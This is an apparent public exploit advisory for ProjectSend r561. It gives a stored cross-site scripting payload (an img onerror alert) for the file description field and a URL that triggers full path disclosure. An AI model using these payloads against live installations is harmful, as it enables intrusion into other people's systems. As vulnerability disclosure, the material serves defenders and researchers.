-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: ProjectSend r561 - Cross Site Scripting & Full Path Disclosure Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend
# Version: r561 Ultimate Version
# CVE: CVE-2014-1155
# Author: TaurusOmar
# Tiwtte: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium
Description
ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Get into code xss in the box of image description.
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION</textarea>
#P0c
"><img src=x onerror=;;alert('XSS') />
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS</textarea>
#Proof Concept
http://i.imgur.com/FOPIvd4.jpg
------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform.
#P0c
http://site.com/projectsend/templates/pinboxes/template.php
#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
